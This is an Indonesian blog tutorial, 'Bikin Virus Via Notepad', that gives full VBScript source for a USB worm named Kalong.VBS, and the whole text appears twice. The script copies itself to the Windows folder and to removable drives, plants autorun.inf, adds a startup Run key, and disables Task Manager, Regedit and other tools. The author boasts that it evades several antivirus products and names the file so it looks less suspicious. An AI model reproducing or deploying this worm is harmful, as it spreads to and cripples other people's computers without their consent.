The Soda Pop

Bikin Virus Via Notepad

Iseng-iseng mencolok Flash
Disc saudara saya tiba-tiba
saya nemu sebuah malcode
lokal yang dibuat dengan
bahasa VBS. Wah, ternyata
para virus maker mulai melirik
memakai bahasa VBS.
Mungkin karena menyangkut
HAKI (Hak Atas Kekayaan
Intelektual) karena VB6.0 yang
banyak beredar adalah
bajakan. Jadi ia membuat virus
dengan VBS yang bisa dibuat
hanya dengan Notepad karena
di Windows sudah ada
compiler yang terintegrasi
dengannya, Windows Based
Script Host.


Sesua janji saya, kita akan
membuat virus yang
sederhana menggunakan
Notepad. Virus ini akan
membuat dirinya menyebar ke
removable disc dengan
AutoRun sehingga komputer
lain yang tercolok flash disc
terinfeksi akan langsung
menjadi korban tanpa
menungu User menjalankan
infector-nya. Virus ini saya
beri nama "Kalong.VBS".
Sekarang buka Notepad-nya.
Copy kode berikut :


'//-Awal dari kode, set agar
ketika terjadi Error dibiarkan
dan kemudian lanjutkan
kegiatan virus-//

on error resume next


'//-Dim kata-kata berikut ini-//

dim
rekur,windowpath,flashdrive
,fs,mf,isi,tf,kalong,nt,check,sd


'//-Set sebuah teks yang
nantinya akan dibuat untuk
Autorun Setup Information-//

isi = "[autorun]" & vbcrlf &
"shellexecute=wscript.exe k4 l0
n6.dll.vbs"

set fs =
createobject("Scripting.File
SystemObject")

set mf =
fs.getfile(Wscript.ScriptFull
name)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text =
mf.openastextstream(1 ,-2)

do while not
text.atendofstream

rekur = rekur & text.readline

rekur = rekur & vbcrlf

loop

do


'//-Copy diri untuk menjadi file
induk di Windows Path
(example: C:\Windows)

Set windowpath =
fs.getspecialfolder(0)

set tf = fs.getfile(windowpath
& "\batch- k4 l0 n6.dll.vbs ")

tf.attributes = 32

set
tf=fs.createtextfile(windowp
ath & "\batch- k4 l0 n6
.dll.vbs",2,true)

tf.write rekursif

tf.close

set tf = fs.getfile(windowpath
& "\batch- k4 l0 n6.dll.vbs ")

tf.attributes = 39

'//-Buat Atorun.inf untuk
menjalankan virus otomatis
setiap flash disc tercolok-//

'Menyebar ke setiap drive
yang bertype 1 dan 2
(removable) termasuk disket


for each flashdrive in fs.drives

'//-Cek Drive-//

If (flashdrive.drivetype = 1 or
flashdrive.drivetype = 2) and
flashdrive.path <> "A:" then


'//-Buat Infector jika ternyata
Drivetypr 1 atau 2. Atau A:\-//

set
tf=fs.getfile(flashdrive.path
&"\k4 l0 n6.dll.vbs ")

tf.attributes =32

set
tf=fs.createtextfile(flashdriv
e.path &"\k4 l0 n6 .dll.vbs
",2,true)

tf.write rekursif

tf.close

set
tf=fs.getfile(flashdrive.path
&"\k4 l0 n6.dll.vbs ")

tf.attributes = 39


'//-Buat Atorun.inf yang teks-
nya tadi sudah disiapkan (Auto
Setup Information)-//

set tf
=fs.getfile(flashdrive.path
&"\autorun.inf")

tf.attributes = 32

set
tf=fs.createtextfile(flashdriv
e.path &"\autorun.inf",2,true)

tf.write isi

tf.close

set tf =
fs.getfile(flashdrive.path
&"\autorun.inf")

tf.attributes=39

end if

next


'//-Manipulasi Registry-//


set kalong =
createobject("WScript.Shell")


'//-Manip - Ubah Title Internet
Explorer menjadi THE KALONG
v.s. ZAY-//

kalong.regwrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Internet
Explorer\Main\Window Title","
THE KALONG v.s. ZAY "


'//-Manip - Set agar file hidden
tidak ditampilkan di Explorer-
//

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explo
rer\Advanced\Hidden", "0'',
"REG_DWORD"


'//-Manip - Hilangkan menu
Find, Folder Options, Run, dan
memblokir Regedit dan Task
Manager-//

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explor
er\NoFind", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explo
rer\NoFolderOptions", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explor
er\NoRun", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Syste
m\DisableRegistryTools", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Syste
m\DisableTaskMgr", "1'',
"REG_DWORD"


'//-Manip - Disable klik kanan-
//

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Expl
orer\NoViewContextMenu",
"1'', "REG_DWORD"


'//-Manip - Munculkan Pesan
Setiap Windows Startup-//

kalong.regwrite
"HKEY_LOCAL_MACHINE\So
ftware\Microsoft\Windows\C
urrentVersion\Winlogon\Leg
alNoticeCaption", "Worm
Kalong. Variant from Rangga-
Zay, don't panic all data are
safe."


'//-Manip - Aktif setiap
Windows Startup-//

kalong.regwrite
"HKEY_LOCAL_MACHINE\So
ftware\Microsoft\Windows\C
urrentVersion\Run\Systemdir",
windowpath & "\batch- k4 l0
n6.dll.vbs "


'//-Manip - Ubah
RegisteredOwner dan
Organization-//

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Register
edOrganization", "The Batrix"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Registe
redOwner","Kalong"


'//-Nah kalau kode dibawah ini
saya nggak tau, tolong Mas
Aat_S untuk menjelaskan-//

if check <> 1 then

Wscript.sleep 200000

end if

loop while check <> 1

set sd =
createobject("Wscript.shell")

sd.run windowpath &
"\explorer.exe /e,/select, " &
Wscript.ScriptFullname

'Akhir dari Kode

Save code di Notepad dengan
cara FILE > SAVE. Lalu di save
as type pilih "All Files (*.*).
Simpan dengan nama : k4 l0
n6.dll.vbs. Sebenarnya gak
usah pake *.dll juga gak apa-
apa tapi usaha agar tidak
mencurigakan aja.


He..he...Virus Worm ini
memang bukan murni dari
pemikiran saya sendiri karena
meniru kode-nya virus Rangga-
Zay. Tapi yang ini lebih bagus
karena tidak terdeteksi pakai
PCMAV RC15, CLAMAV, dan
AVAST. Itung-itung ini buat
Anda tahu kalau membuat
virus/worm tidak perlu
membeli software bajakan.
Pakai Notepad (dari Windows
Original) juga bisa.
Bikin Virus Via Notepad


Iseng-iseng mencolok Flash
Disc saudara saya tiba-tiba
saya nemu sebuah malcode
lokal yang dibuat dengan
bahasa VBS. Wah, ternyata
para virus maker mulai melirik
memakai bahasa VBS.
Mungkin karena menyangkut
HAKI (Hak Atas Kekayaan
Intelektual) karena VB6.0 yang
banyak beredar adalah
bajakan. Jadi ia membuat virus
dengan VBS yang bisa dibuat
hanya dengan Notepad karena
di Windows sudah ada
compiler yang terintegrasi
dengannya, Windows Based
Script Host.


Sesua janji saya, kita akan
membuat virus yang
sederhana menggunakan
Notepad. Virus ini akan
membuat dirinya menyebar ke
removable disc dengan
AutoRun sehingga komputer
lain yang tercolok flash disc
terinfeksi akan langsung
menjadi korban tanpa
menungu User menjalankan
infector-nya. Virus ini saya
beri nama "Kalong.VBS".
Sekarang buka Notepad-nya.
Copy kode berikut :


'//-Awal dari kode, set agar
ketika terjadi Error dibiarkan
dan kemudian lanjutkan
kegiatan virus-//

on error resume next


'//-Dim kata-kata berikut ini-//

dim
rekur,windowpath,flashdrive
,fs,mf,isi,tf,kalong,nt,check,sd


'//-Set sebuah teks yang
nantinya akan dibuat untuk
Autorun Setup Information-//

isi = "[autorun]" & vbcrlf &
"shellexecute=wscript.exe k4 l0
n6.dll.vbs"

set fs =
createobject("Scripting.File
SystemObject")

set mf =
fs.getfile(Wscript.ScriptFull
name)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text =
mf.openastextstream(1 ,-2)

do while not
text.atendofstream

rekur = rekur & text.readline

rekur = rekur & vbcrlf

loop

do


'//-Copy diri untuk menjadi file
induk di Windows Path
(example: C:\Windows)

Set windowpath =
fs.getspecialfolder(0)

set tf = fs.getfile(windowpath
& "\batch- k4 l0 n6.dll.vbs ")

tf.attributes = 32

set
tf=fs.createtextfile(windowp
ath & "\batch- k4 l0 n6
.dll.vbs",2,true)

tf.write rekursif

tf.close

set tf = fs.getfile(windowpath
& "\batch- k4 l0 n6.dll.vbs ")

tf.attributes = 39

'//-Buat Atorun.inf untuk
menjalankan virus otomatis
setiap flash disc tercolok-//

'Menyebar ke setiap drive
yang bertype 1 dan 2
(removable) termasuk disket


for each flashdrive in fs.drives

'//-Cek Drive-//

If (flashdrive.drivetype = 1 or
flashdrive.drivetype = 2) and
flashdrive.path <> "A:" then


'//-Buat Infector jika ternyata
Drivetypr 1 atau 2. Atau A:\-//

set
tf=fs.getfile(flashdrive.path
&"\k4 l0 n6.dll.vbs ")

tf.attributes =32

set
tf=fs.createtextfile(flashdriv
e.path &"\k4 l0 n6 .dll.vbs
",2,true)

tf.write rekursif

tf.close

set
tf=fs.getfile(flashdrive.path
&"\k4 l0 n6.dll.vbs ")

tf.attributes = 39


'//-Buat Atorun.inf yang teks-
nya tadi sudah disiapkan (Auto
Setup Information)-//

set tf
=fs.getfile(flashdrive.path
&"\autorun.inf")

tf.attributes = 32

set
tf=fs.createtextfile(flashdriv
e.path &"\autorun.inf",2,true)

tf.write isi

tf.close

set tf =
fs.getfile(flashdrive.path
&"\autorun.inf")

tf.attributes=39

end if

next


'//-Manipulasi Registry-//


set kalong =
createobject("WScript.Shell")


'//-Manip - Ubah Title Internet
Explorer menjadi THE KALONG
v.s. ZAY-//

kalong.regwrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Internet
Explorer\Main\Window Title","
THE KALONG v.s. ZAY "


'//-Manip - Set agar file hidden
tidak ditampilkan di Explorer-
//

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explo
rer\Advanced\Hidden", "0'',
"REG_DWORD"


'//-Manip - Hilangkan menu
Find, Folder Options, Run, dan
memblokir Regedit dan Task
Manager-//

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explor
er\NoFind", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explo
rer\NoFolderOptions", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explor
er\NoRun", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Syste
m\DisableRegistryTools", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Syste
m\DisableTaskMgr", "1'',
"REG_DWORD"


'//-Manip - Disable klik kanan-
//

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Expl
orer\NoViewContextMenu",
"1'', "REG_DWORD"


'//-Manip - Munculkan Pesan
Setiap Windows Startup-//

kalong.regwrite
"HKEY_LOCAL_MACHINE\So
ftware\Microsoft\Windows\C
urrentVersion\Winlogon\Leg
alNoticeCaption", "Worm
Kalong. Variant from Rangga-
Zay, don't panic all data are
safe."


'//-Manip - Aktif setiap
Windows Startup-//

kalong.regwrite
"HKEY_LOCAL_MACHINE\So
ftware\Microsoft\Windows\C
urrentVersion\Run\Systemdir",
windowpath & "\batch- k4 l0
n6.dll.vbs "


'//-Manip - Ubah
RegisteredOwner dan
Organization-//

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Register
edOrganization", "The Batrix"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Registe
redOwner","Kalong"


'//-Nah kalau kode dibawah ini
saya nggak tau, tolong Mas
Aat_S untuk menjelaskan-//

if check <> 1 then

Wscript.sleep 200000

end if

loop while check <> 1

set sd =
createobject("Wscript.shell")

sd.run windowpath &
"\explorer.exe /e,/select, " &
Wscript.ScriptFullname

'Akhir dari Kode

Save code di Notepad dengan
cara FILE > SAVE. Lalu di save
as type pilih "All Files (*.*).
Simpan dengan nama : k4 l0
n6.dll.vbs. Sebenarnya gak
usah pake *.dll juga gak apa-
apa tapi usaha agar tidak
mencurigakan aja.


He..he...Virus Worm ini
memang bukan murni dari
pemikiran saya sendiri karena
meniru kode-nya virus Rangga-
Zay. Tapi yang ini lebih bagus
karena tidak terdeteksi pakai
PCMAV RC15, CLAMAV, dan
AVAST. Itung-itung ini buat
Anda tahu kalau membuat
virus/worm tidak perlu
membeli software bajakan.
Pakai Notepad (dari Windows
Original) juga bisa.

HOME